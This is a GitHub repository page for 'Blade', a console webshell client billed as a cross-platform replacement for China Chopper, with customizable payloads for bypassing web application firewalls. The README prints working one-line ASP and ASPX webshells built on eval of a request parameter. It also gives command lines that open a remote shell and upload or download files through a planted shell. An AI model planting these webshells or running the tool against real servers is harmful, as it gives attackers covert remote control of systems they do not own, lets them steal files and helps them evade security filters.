A webshell connection tool with customized WAF bypass payloads
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
lib Add some new features (High light, auto complete, loging, etc) Sep 4, 2016
payloads ASPX supporting Sep 4, 2016
webshells ASPX supporting Sep 4, 2016
.gitignore Some little changes in payloaders Jan 10, 2016
LICENSE Initial commit Dec 3, 2015
README.md readme format Sep 12, 2018
blade.py Add Database payload for PHP Jan 16, 2016

README.md

Blade

Blade is a webshell connection tool based on console, currently under development and aims to be a choice of replacement of Chooper (中国菜刀). Chooper is a very cool webshell client with widly typies of server side scripts supported, but Chooper can only work on Windows opreation system, so this is the motivation of create another "Chooper" supporting Windows, Linux & Mac OS X. Blade is based on Python, so it allows users to modify the webshell connection payloads so that Blade can bypass some specified WAF which Chooper can not.

Major functions

Manage a web server with only one-line code on it, just like:

PHP, ASP, ASPX & JSP supported.

Terminal Console provided.

File management & Dadabase management.

Features

Cross-plaform supported (Python needed)

Customizable WAF bypass payloads

Compatible with Chooper's server side scripts

Server side scripts examples

PHP:

ASP: <%eval request("cmd")%>

ASPX: <%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>

Usage

Get a shell:

python blade.py -u http://localhost/shell.php -s php -p cmd --shell

Get a shell with longer timeout (i.e. for windows):

python blade.py -u http://localhost/shell.aspx -s asp -p cmd --shell -t 60

Download a file:

python blade.py -u http://localhost/shell.php -s php -p cmd --pull remote_path local_path

Upload a file:

python blade.py -u http://localhost/shell.php -s php -p cmd --push local_path remote_path

Current issues

Server side scripts supporting is not completed, currently support PHP, ASP and ASPX ASPX file upload/download is still under development

Database management function is not completed, so can not connect databases

TODO

Implment JSP

Fix file handling

Future developent

Beacuse I am busy sometimes, the progress of development may be a bit slow. If anyone intrest this project, welcome fork!